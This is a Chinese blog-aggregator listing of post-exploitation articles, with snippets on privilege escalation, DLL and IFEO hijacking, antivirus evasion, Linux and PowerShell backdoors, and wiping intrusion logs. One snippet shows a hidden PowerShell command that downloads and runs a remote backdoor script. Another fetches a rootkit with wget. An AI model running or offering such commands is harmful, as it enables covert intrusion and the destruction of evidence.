E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
后渗透篇
后渗透篇
:Windows x64下提权Exploit整理
Windows x64 Local Privilege Escalation0x00前言在CVE-2014-4113出来后,x64环境下的提权又是一片短暂的光明。在此漏洞披露前,PR/IIS溢出/LPK劫持等对64位版本都无效果,网上公开曾有一个Exp有效,代号为MS10048x64。本文谨记录x64下可提权的Exp与测试过程。暂不考虑依赖第三方服务(如MSSQL/MYSQL/FTP)等的提权。
bylfsj
·
2022-07-08 07:40
后渗透篇
:劫持技术(lpk.dll劫持游戏注入【Win7 实例】)
当你的才华还撑不起你的野心时那你就应该静下心来学习lpk.dll劫持游戏注入由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索DLL文件。首先会尝试从当前程序所在的目录加载DLL,如果没找到,则在Windows系统目录中查找,最后是在环境变量中列出的各个目录下查找。利用这个特点,先伪造一个系统同名的DLL,提供同样的输出表,每个输出函数转向真正的系统DLL。程序调用系统DLL
bylfsj
·
2022-07-08 07:10
后渗透篇
:清理windows入侵痕迹总结【详细】
当你的才华还撑不起你的野心时那你就应该静下心来学习目录清理windows入侵痕迹0x01前言了解为什么需要清除入侵痕迹?一、设置跳板二、必不可少的跳板三、代理服务器简介1)http代理服务器2)Sock5代理服务器3)VPN代理服务器四、使用Tor隐身了解需要删除哪些日志?1.默认提供的日志2.防火墙日志3.IIS日志4、netstat-an表示什么意思?0x02清除Windows日志0x01.1
Vdieoo
·
2022-05-10 05:10
渗透测试
经验分享
后渗透篇
:Metasploit shellter免杀
当你的才华还撑不起你的野心时那你就应该静下心来学习目录Metasploitshellter免杀0x01Shellter介绍0x02案例演示0x03Metasploit&Shellter捆绑免杀Metasploitshellter免杀0x01Shellter介绍Shellter是一个动态的shellcode注入工具。它可用于将shellcode捆绑注入本机Windows应用程序(仅限于32位应用程序
Agan '
·
2020-08-18 19:09
渗透测试
后渗透篇
免杀篇
后渗透篇
:隐藏克隆账号
当你的才华还撑不起你的野心时那你就应该静下心来学习目录隐藏克隆账号0x01介绍0x02前言0x03实例演示0x04检测和清理方法0x05编写脚本实现思路1、对注册表添加管理员帐户的编辑权限2、直接获得System权限0x06结合远程桌面多用户登录的利用思路1、复制管理员帐户Administrator2、复制已有帐户3、新建帐户再复制4、原帐户的维持0x07防御0x08拓展知识隐藏克隆账号0x01介
Agan '
·
2020-08-16 11:59
渗透测试
后渗透篇
后门篇
后渗透篇
:linux入侵控制与痕迹清理
(1)开机自动反弹shell(2)linux后门Rookit目前常用的有:t0rn/mafix/enyelkm等mafixrootkitMafix是一款常用的轻量应用级别Rootkits,是通过伪造ssh协议漏洞实现远程登陆的特点是配置简单并可以自定义验证密码和端口号。URL:http://forum.eviloctal.com/attachment.php?aid=13419安装及使用:wget
Agan '
·
2020-08-11 11:07
渗透测试
后渗透篇
入侵日志清除笔记
后渗透篇
:如何创建Powershell持久隐蔽后门
用户开机后每次运行特定的快捷方式文件时触发一段恶意的powershell代码,原始应用程序仍然启动,原始图标保留,并且没有powershell.exe窗口弹出。1.安装后门这次需要用到powershell攻击框架Empire,使用Empire/data/module_source/persistence/Invoke-BackdoorLNK.ps1这个脚本powershell-nop-execby
Agan '
·
2020-08-02 15:06
渗透测试
后渗透篇
后渗透篇
:Windows x64下提权Exploit整理
Windows x64 Local Privilege Escalation0x00前言在CVE-2014-4113出来后,x64环境下的提权又是一片短暂的光明。在此漏洞披露前,PR/IIS溢出/LPK劫持等对64位版本都无效果,网上公开曾有一个Exp有效,代号为MS10048x64。本文谨记录x64下可提权的Exp与测试过程。暂不考虑依赖第三方服务(如MSSQL/MYSQL/FTP)等的提权。
Agan '
·
2020-07-04 05:37
渗透测试
后渗透篇
后门篇
后渗透篇
:清理windows入侵痕迹总结【详细】
当你的才华还撑不起你的野心时那你就应该静下心来学习目录清理windows入侵痕迹0x01前言了解为什么需要清除入侵痕迹?一、设置跳板二、必不可少的跳板三、代理服务器简介1)http代理服务器2)Sock5代理服务器3)VPN代理服务器四、使用Tor隐身了解需要删除哪些日志?1.默认提供的日志2.防火墙日志3.IIS日志4、netstat-an表示什么意思?0x02清除Windows日志0x01.1
Agan '
·
2020-06-21 21:06
渗透测试
后渗透篇
入侵日志清除笔记
后渗透篇
:Linux 后门类型【总结】
当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01前言0x02增加超级用户0x03小案例0x04破解0x05放置SUIDShell0x06Crontab后门0x07ssh公钥免密0x08alias后门0x09pam后门oropenssh0x10SSH后门0x11SSHwrapper后门简介0x12mafixrootkit0x13利用系统服务程序0x14TCP/UDP/ICMPShell
Agan '
·
2020-06-21 21:06
渗透测试
后渗透篇
木马篇
后渗透篇
:一款不错的PowerShell后门(无毒隐蔽性极强)
这款后门一共有三个模式,下面给大家依次讲解他们的不同,请大家按照需求使用!第一款Backd00r-webshell.zip使用方法:CMD执行powershell.exe-nop-windowstylehidden-execbypass-c"IEX(New-ObjectNet.WebClient).DownloadString('绝对路径或者远程路径/Backd00r-webshell.ps1')
Agan '
·
2020-06-21 21:35
渗透测试
后渗透篇
后渗透篇
:Linux 后门类型【总结】
原文链接:https://blog.csdn.net/God_XiangYu/article/details/100051744当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01前言0x02增加超级用户0x03小案例0x04破解0x05放置SUIDShell0x06Crontab后门0x07ssh公钥免密0x08alias后门0x09pam后门oropenssh0x10SSH后门0x1
bylfsj
·
2019-10-08 20:41
渗透测试总结篇(持续更新中...)
这次总结大概分为几个部分(以后有可能加一些东西进去):1、基础部分2、漏洞篇3、工具篇4、
后渗透篇
基础部分:HTTP数据包分析谷歌语法Windows基础Linux基础信息探针Firefox渗透测试插件漏洞篇
Awrrays
·
2019-09-20 14:00
后渗透篇
:灰鸽子远控使用教程
原文链接:http://www.hetianlab.com/expc.do?ce=314427df-5dc4-429b-af69-69ad94d8802b当你的才华还撑不起你的野心时那你就应该静下心来学习目录灰鸽子远控使用教程0x01介绍0x02网络拓扑见下图:控制端环境准备灰鸽子体验灰鸽子远控使用教程0x01介绍“灰鸽子”是现在网络上非常流行的一种木马,由两部分组成,一是控制端(主程序),一是服
Causal_Escap
·
2019-08-30 01:40
渗透测试
后渗透篇
木马篇
后渗透篇
:收录几篇不错的入侵检查文章
当你的才华还撑不起你的野心时那你就应该静下心来学习收录几篇不错的入侵检查文章1、浅谈大型互联网企业入侵检测及防护策略https://xz.aliyun.com/t/32972、大型互联网企业入侵检测实战总结https://xz.aliyun.com/t/16263、使用基于Web的攻击手法发现并入侵物联网设备https://xz.aliyun.com/t/37964、从入侵到变现——“黑洞”下的黑
Causal_Escap
·
2019-08-27 00:54
渗透测试
后渗透篇
渗透测试书籍
后渗透篇
:映像劫持技术
当你的才华还撑不起你的野心时那你就应该静下心来学习映像劫持技术所谓的映像劫持就是ImageFileExecutionOptions(IFEO),位于注册表的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions1、打开注册表,选择ImageFileExecutionOption
Causal_Escap
·
2019-08-26 02:54
渗透测试
后渗透篇
劫持技术
后渗透篇
:Windows 2008 server提权之突破系统权限安装shift后门
原文链接:https://www.cnblogs.com/h4ck0ne/p/5154672.html当你的才华还撑不起你的野心时那你就应该静下心来学习目录Windows2008server提权之突破系统权限安装shift后门0x01前言0x02主要操作部分0x03主要命令组成部分Windows2008server提权之突破系统权限安装shift后门0x01前言大家都知道08权限的系统权限设置很严
Causal_Escap
·
2019-08-24 03:54
渗透测试
后渗透篇
后门篇
上一页
1
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他